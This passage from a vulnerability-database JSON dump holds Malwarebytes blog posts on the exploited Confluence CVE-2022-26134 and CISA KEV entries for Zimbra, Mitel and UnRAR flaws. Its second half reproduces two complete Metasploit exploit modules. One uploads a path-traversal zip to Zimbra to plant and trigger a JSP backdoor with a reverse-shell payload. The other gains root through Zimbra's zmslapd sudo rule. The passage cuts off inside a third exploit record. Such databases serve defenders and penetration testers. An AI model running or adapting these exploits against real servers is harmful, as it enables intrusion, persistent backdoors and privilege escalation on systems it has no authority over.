"2022-06-03T14:41:58", "type": "malwarebytes", "title": "[updated]Unpatched Atlassian Confluence vulnerability is actively exploited", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T14:41:58", "id": "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-14T17:04:04", "description": "Microsoft has warned that &quot;multiple adversaries and nation-state actors&quot; are making use of the recent Atlassian Confluence RCE vulnerability. A fix is now available for [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>). It is essential users of Confluence address the patching issue immediately. \n\n## Confluence vulnerability: Background\n\nAt the start of June, researchers [discovered a vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) in Atlassian Confluence via an incident response investigation. Confluence, a Wiki-style collaboration tool, experienced a &quot;critical unauthenticated remote code execution vulnerability&quot;. It affected Confluence server and Confluence Data Center.\n\nThe attack discovered during the investigation revealed web shells deployed on the server. These web shells allow for Persistent access on compromised web applications. The web server process and its child processes ran as root and full privileges. This is very bad news, and allowed for execution of commands even without valid credentials.\n\nWorse, the web shell found is one commonly used by various Advanced Persistent Threat (APT) groups. This almost certainly isn&#x27;t the kind of thing admins discovering an attack want to hear mid-investigation.\n\nUnfortunately, mitigation advice was somewhat limited. It veered between restricting access to just turning off Confluence Server and Data Center instances. On June 3, Atlassian [released](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>) versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contained a fix for this vulnerability.\n\n## The current situation\n\nHere&#x27;s the latest observations from Microsoft:\n\n> Multiple adversaries and nation-state actors, including DEV-0401 and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134. We urge customers to upgrade to the latest version or apply recommended mitigations: <https://t.co/C3CykQgrOJ>\n> \n> -- Microsoft Security Intelligence (@MsftSecIntel) [June 11, 2022](<https://twitter.com/MsftSecIntel/status/1535417776290111489?ref_src=twsrc%5Etfw>)\n\nMicrosoft continues:\n\n> _In many cases impacted devices have been observed with multiple disparate instances of malicious activity, including extensive device and domain discovery, and the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and ransomware._\n\n## A mixed bag of attacks\n\nIndustrious malware authors really have been having a grand time of things with this vulnerability. As noted by Microsoft, several varied approaches to compromise and exploitation are being used. [AvosLocker Ransomware](<https://www.bleepingcomputer.com/news/security/confluence-servers-hacked-to-deploy-avoslocker-cerber2021-ransomware/>) and [Linux botnets](<https://www.bleepingcomputer.com/news/security/linux-botnets-now-exploit-critical-atlassian-confluence-bug/>) are getting in on the action. Cryptomining [jumping on the bandwagon](<https://www.bleepingcomputer.com/news/security/hackers-exploit-recently-patched-confluence-bug-for-cryptomining/>) is an inevitability across most scams we see, and this is no exception.\n\nMicrosoft also noticed the Confluence vulnerability being exploited to download and deploy Cerber2021 ransomware. The Record [observed](<https://therecord.media/microsoft-ransomware-groups-nation-states-exploiting-atlassian-confluence-vulnerability/>) that Cerber2021 is a &quot;relatively minor player&quot;, with both Windows and Linux versions used to lock up machines. Here&#x27;s an example of the ransomware, via MalwareHunterTeam:\n\n> There is a ransomware currently active that is calling itself Cerber. \nHas Windows &amp; Linux versions. \nLooks started to spread in the first half of November. IDR seen both Linux (multiple victims got git files encrypted) &amp; Windows user victims already from different countries. \n \n [pic.twitter.com/saPGsTlDbt](<https://t.co/saPGsTlDbt>)\n> \n> -- MalwareHunterTeam (@malwrhunterteam) [December 4, 2021](<https://twitter.com/malwrhunterteam/status/1467264298237972484?ref_src=twsrc%5Etfw>)\n\nHaving the fixes to address this issue is great, but organisations need to actually make use of them. This is still a serious problem for anyone using unpatched versions of affected Confluence installations.\n\nIf you don&#x27;t want to run the gauntlet of APT groups, cryptomining chancers, botnets and more, the message is loud and clear: get on over to the [Confluence Download Archives](<https://www.atlassian.com/software/confluence/download-archives>) and patch immediately.\n\nThe post [&quot;Multiple adversaries&quot; exploiting Confluence vulnerability, warns Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T12:43:08", "type": "malwarebytes", "title": "\u201cMultiple adversaries\u201d exploiting Confluence vulnerability, warns Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-14T12:43:08", "id": "MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) contains flaw in the mboximport functionality, allowing an authenticated attacker to upload arbitrary files to perform remote code execution. This vulnerability was chained with CVE-2022-37042 which allows for unauthenticated remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T00:00:00", "id": "CISA-KEV-CVE-2022-27925", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) contains an authentication bypass vulnerability in MailboxImportServlet. This vulnerability was chained with CVE-2022-27925 which allows for unauthenticated remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T00:00:00", "id": "CISA-KEV-CVE-2022-37042", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "The Service Appliance component in Mitel MiVoice Connect allows remote code execution due to incorrect data validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-27T00:00:00", "type": "cisa_kev", "title": "Mitel MiVoice Connect Data Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-27T00:00:00", "id": "CISA-KEV-CVE-2022-29499", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:41:25", "description": "Atlassian Questions For Confluence App has hard-coded credentials, exposing the username and password in plaintext. A remote unauthenticated attacker can use these credentials to log into Confluence and access all content accessible to users in the confluence-users group.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-29T00:00:00", "type": "cisa_kev", "title": "Atlassian Questions For Confluence App Hard-coded Credentials Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-29T00:00:00", "id": "CISA-KEV-CVE-2022-26138", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) allows an attacker to inject memcache commands into a targeted instance which causes an overwrite of arbitrary cached entries.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-04T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-08-04T00:00:00", "id": "CISA-KEV-CVE-2022-27924", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:24:43", "description": "RARLAB UnRAR on Linux and UNIX contains a directory traversal vulnerability, allowing an attacker to write to files during an extract (unpack) operation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T00:00:00", "type": "cisa_kev", "title": "RARLAB UnRAR Directory Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-09T00:00:00", "id": "CISA-KEV-CVE-2022-30333", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:41:25", "description": "Atlassian Confluence Server and Data Center contain a remote code execution vulnerability that allows for an unauthenticated attacker to perform remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA-KEV-CVE-2022-26134", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-08-24T13:30:03", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T00:00:00", "type": "packetstorm", "title": "Zimbra Zip Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-24T00:00:00", "id": "PACKETSTORM:168146", "href": "https://packetstormsecurity.com/files/168146/Zimbra-Zip-Path-Traversal.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'rex/zip' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)', \n'Description' => %q{ \nThis module POSTs a ZIP file containing path traversal characters to \nthe administrator interface for Zimbra Collaboration Suite. If \nsuccessful, it plants a JSP-based backdoor within the web directory, then \nexecutes it. \n \nThe core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's \nZIP implementation that can result in the extraction of an arbitrary file \nto an arbitrary location on the host. \n \nThis issue is exploitable on the following versions of Zimbra: \n \n* Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier) \n* Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier) \n \nNote that the Open Source Edition is not affected. \n}, \n'Author' => [ \n'Volexity Threat Research', # Initial writeup \n\"Yang_99's Nest\", # PoC \n'Ron Bowes', # Analysis / module \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-27925'], \n['CVE', '2022-37042'], \n['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'], \n['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'], \n['URL', 'https://www.yang99.top/index.php/archives/82/'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'], \n], \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [ \n[ 'Zimbra Collaboration Suite', {} ] \n], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/', \n'TARGET_FILENAME' => nil, \n'RPORT' => 7071, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'Privileged' => false, \n'DisclosureDate' => '2022-05-10', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']), \nOptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']), \nOptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']), \n] \n) \nend \n \n# Generate an on-system filename using datastore options \ndef generate_target_filename \nif datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') \nprint_warning('TARGET_FILENAME does not end with .jsp, was that intentional?') \nend \n \nFile.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\") \nend \n \n# Normalize the path traversal and figure out where it is relative to the web root \ndef zimbra_get_public_path(target_filename) \n# Normalize the path \nnormalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath \n \n# Figure out where it is, relative to the webroot \nwebroot = Pathname.new('/opt/zimbra/jetty_base/webapps/') \nrelative_path = normalized_path.relative_path_from(webroot) \n \n# Hopefully, we found a path from the webroot to the payload! \nif relative_path.to_s.start_with?('../') \nreturn nil \nend \n \nrelative_path \nend \n \ndef exploit \nprint_status('Encoding the payload as a .jsp file') \npayload = Msf::Util::EXE.to_jsp(generate_payload_exe) \n \n# Create a file \ntarget_filename = generate_target_filename \nprint_status(\"Target filename: #{target_filename}\") \n \n# Create a zip file \nzip = Rex::Zip::Archive.new \nzip.add_file(target_filename, payload) \ndata = zip.pack \n \nprint_status('Sending POST request with ZIP file') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => \"/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1\", \n'data' => data \n) \n \n# Check the response \nif res.nil? \nfail_with(Failure::Unreachable, \"Could not connect to the target port (#{datastore['RPORT']})\") \nelsif res.code == 404 \nfail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable') \nelsif res.code != 401 \nprint_warning(\"Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed\") \nend \n \n# Get the public path for triggering the vulnerability, terminate if we \n# can't figure it out \npublic_filename = zimbra_get_public_path(target_filename) \nif public_filename.nil? \nfail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?') \nend \n \nregister_file_for_cleanup(target_filename) \n \nprint_status(\"Trying to trigger the backdoor @ #{public_filename}\") \n \n# Trigger the backdoor \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(public_filename) \n) \n \nif res.nil? \nfail_with(Failure::Unreachable, 'Could not connect to trigger the payload') \nelsif res.code == 200 \nprint_good('Successfully triggered the payload') \nelsif res.code == 404 \nfail_with(Failure::Unknown, \"Payload was not uploaded, the server probably isn't vulnerable\") \nelse \nfail_with(Failure::Unknown, \"Could not connect to the server to trigger the payload: HTTP/#{res.code}\") \nend \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/168146/zimbra_mboximport_cve_2022_27925.rb.txt"}, {"lastseen": "2022-08-10T16:46:08", "description": "", "cvss3": {}, "published": "2022-08-10T00:00:00", "type": "packetstorm", "title": "Zimbra zmslapd Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-37393"], "modified": "2022-08-10T00:00:00", "id": "PACKETSTORM:168048", "href": "https://packetstormsecurity.com/files/168048/Zimbra-zmslapd-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Compile \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zimbra zmslapd arbitrary module load', \n'Description' => %q{ \nThis module exploits CVE-2022-37393, which is a vulnerability in \nZimbra's sudo configuration that permits the zimbra user to execute \nthe zmslapd binary as root with arbitrary parameters. As part of its \nintended functionality, zmslapd can load a user-defined configuration \nfile, which includes plugins in the form of .so files, which also \nexecute as root. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Darren Martyn', # discovery and poc \n'Ron Bowes', # Module \n], \n'DisclosureDate' => '2021-10-27', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Privileged' => true, \n'References' => [ \n[ 'CVE', '2022-37393' ], \n[ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ], \n], \n'Targets' => [ \n[ 'Auto', {} ], \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ IOC_IN_LOGS ] \n} \n) \n) \nregister_options [ \nOptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]), \nOptString.new('ZIMBRA_BASE', [ true, \"Zimbra's installation directory\", '/opt/zimbra' ]), \n] \nregister_advanced_options [ \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \nend \n \n# Because this isn't patched, I can't say with 100% certainty that this will \n# detect a future patch (it depends on how they patch it) \ndef check \n# Sanity check \nif is_root? \nfail_with(Failure::None, 'Session already has root privileges') \nend \n \nunless file_exist?(\"#{datastore['ZIMBRA_BASE']}/libexec/zmslapd\") \nprint_error(\"zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)\") \nreturn CheckCode::Safe \nend \n \nunless command_exists?(datastore['SUDO_PATH']) \nprint_error(\"Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)\") \nreturn CheckCode::Safe \nend \n \n# Run `sudo -n -l` to make sure we have access to the target command \ncmd = \"#{datastore['SUDO_PATH']} -n -l\" \nprint_status \"Executing: #{cmd}\" \noutput = cmd_exec(cmd).to_s \n \nif !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required') \nprint_error('Current user could not execute sudo -l') \nreturn CheckCode::Safe \nend \n \nif !output.include?(\"(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd\") \nprint_error('Current user does not have access to run zmslapd') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nbase_dir = datastore['WritableDir'].to_s \nunless writable?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is not writable\") \nend \n \n# Generate a random directory \nexploit_dir = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\" \nif file_exist?(exploit_dir) \nfail_with(Failure::BadConfig, 'Exploit dir already exists') \nend \n \n# Create the directory and get ready to remove it \nprint_status(\"Creating exploit directory: #{exploit_dir}\") \nmkdir(exploit_dir) \nregister_dir_for_cleanup(exploit_dir) \n \n# Generate some filenames \nlibrary_name = \".#{rand_text_alphanumeric(5..10)}.so\" \nlibrary_path = \"#{exploit_dir}/#{library_name}\" \nconfig_name = \".#{rand_text_alphanumeric(5..10)}\" \nconfig_path = \"#{exploit_dir}/#{config_name}\" \n \n# Create the .conf file \nconfig = \"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\" \nwrite_file(config_path, config) \n \nwrite_file(library_path, generate_payload_dll) \n \ncmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\" \nprint_status \"Attempting to trigger payload: #{cmd}\" \nout = cmd_exec(cmd) \n \nunless session_created? \nprint_error(\"Failed to create session! Cmd output = #{out}\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/168048/zimbra_slapper_priv_esc.rb.txt"}, {"lastseen": "2022-08-05T16:04:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-05T00:00:00", "type": "packetstorm", "title": "Zimbra UnRAR Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 